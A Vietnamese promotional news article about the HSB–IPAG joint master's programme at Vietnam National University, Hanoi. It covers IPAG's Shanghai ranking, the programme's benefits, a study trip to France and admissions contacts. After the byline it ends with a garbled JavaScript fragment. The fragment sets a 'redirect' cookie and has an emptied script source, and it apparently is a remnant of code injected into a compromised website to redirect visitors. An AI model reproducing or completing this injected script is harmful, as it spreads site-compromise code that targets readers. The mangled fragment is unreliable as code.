HSB-IPAG-1Thứ hạng của IPAG đang cao hơn RMIT University của Australia, Osaka University và Kyoto của Nhật. Đây là ghi nhận của các nhà khoa học cũng như các học viên dành cho các chương trình đào tạo xuất sắc của IPAG trong suốt những năm qua.

Theo kết quả mới nhất của bảng xếp hạng danh tiếng Shanghai ranking, trường Kinh doanh IPAG (IPAG Business School) – đối tác liên kết đào tạo chương trình Thạc sĩ Khoa học Quản trị Kinh doanh (HSB-IPAG) đứng ở Top 300 trường Kinh tế tốt nhất toàn cầu. Thứ hạng của IPAG đang cao hơn RMIT University của Australia, Osaka University và Kyoto của Nhật. Đây là ghi nhận của các nhà khoa học cũng như các học viên dành cho các chương trình đào tạo xuất sắc của IPAG trong suốt những năm qua.

Hợp tác đào tạo cùng Khoa Quản trị và Kinh doanh (HSB) từ năm 2014, IPAG đã khẳng định được thương hiệu uy tín qua chương trình Thạc sĩ Khoa học Quản trị Kinh doanh. Chương trình đã đem đến cho học viên nhiều giá trị nổi bật như:

– Chương trình được ĐHQGHN cấp phép và được Cục Khảo thí và Đảm bảo Chất lượng, Bộ Giáo dục và Đào tạo công nhận văn bằng;

– Hình thức xét tuyển linh hoạt, hiện đại; Xét duyệt hồ sơ và phỏng vấn trực tiếp do giảng viên của HSB và Trường Kinh doanh IPAG để kiểm tra kinh nghiệm làm việc, động cơ học tập và trình độ tiếng Anh.

– Nội dung đào tạo liên ngành có tính ứng dụng cao;

– Đội ngũ giảng viên xuất sắc trình độ quốc tế được lựa chọn từ Trường Kinh doanh IPAG và khoa Quản trị và Kinh doanh (HSB) – ĐHQGHN;

– Môi trường học tập sáng tạo, thân thiện, cơ sở vật chất hiện đại, kho dữ liệu tham khảo phong phú trên thư viện trực tuyến của IPAG;

– Cơ hội phát triển các mối quan hệ trong cộng đồng cựu học viên HSB và IPAG trên toàn thế giới; Cơ hội du học, học tiếp lên Tiến sĩ tại Việt Nam, Pháp và các nước trên thế giới.

Xep-hang-IPAG 2   Xep-hang-IPAG 1

 Thông tin thứ tự xếp hạng của IPAG trên Shanghai ranking tại địa chỉ website: www.shanghairanking.com

Vừa qua, HSB phối hợp cùng IPAG tổ chức chương trình học tập và giao lưu văn hóa tại CH Pháp dành cho các học viên của lớp HSB-IPAG trong thời gian 2 tuần. Trong chương trình này, các học viên không chỉ được tiếp cận với các tri thức tiên tiến của châu Âu và thế giới, trải nghiệm phong cách dạy và học hiện đại của các chuyên gia, giáo sư hàng đầu của Pháp, mà còn được tham quan các mô hình doanh nghiệp nổi bật. Đồng thời, học viên còn có cơ hội được trải nghiệm nét văn hóa đặc sắc của các nước Châu Âu (Pháp, Đức, Ý, Thụy Sĩ, Monaco…).

HSB-IPAG-1

Chuyến đi thành công thực sự đã để lại dấu ấn đậm nét cho các học viên của chương trình HSB-IPAG. PGS.TS Nguyễn Đức Khương, Thành viên Tổ tư vấn kinh tế của Thủ tướng Chính phủ, Trưởng khoa Tài chính – IPAG; GS.Patrick Legland (Trường Kinh doanh IPAG) đã đánh giá cao năng lực học tập và tinh thần cầu tiến, khả năng ngoại ngữ của các học viên tham gia chương trình.

Học viên Nguyễn Văn Tới – IPAG 04 (hiện công tác tại Học viện Viettel) cho biết: “Trân trọng cảm ơn HSB và PGS.TS.Nguyễn Ngọc Thắng – Giám đốc chương trình, đã mang đến cho chúng tôi một chuyến đi đáng nhớ khi được tham gia học tập, giao lưu văn hoá tại Pháp và một số quốc gia tại Châu Âu. Đây là một trong những giá trị to lớn và khác biệt của chương trình HSB-IPAG dành cho các học viên.”

HSB-IPAG-2

Chương trình học tập và giao lưu văn hóa tại CH Pháp được tổ chức thường niên dành cho các học viên của chương trình Thạc sĩ Khoa học Quản trị Kinh doanh do HSB liên kết đào tạo cùng Trường Kinh doanh IPAG. Thành công của chuyến đi đã mở ra nhiều khả năng hợp tác trong các chương trình đào tạo của hai đơn vị.

Để biết thông tin chi tiết về chương trình, vui lòng liên hệ:

Phòng Tuyển sinh – Khoa Quản trị và Kinh doanh (HSB), Đại học Quốc gia Hà Nội

Địa chỉ: Tầng 2, nhà B1, số 144 Xuân Thuỷ, Cầu Giấy, Hà Nội

Hotline: 0968.20.22.44 – 024.3754 8456 (máy lẻ 232)

Email: [email protected]

Website: http://hsb.edu.vn/

Nguyên Minh

{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}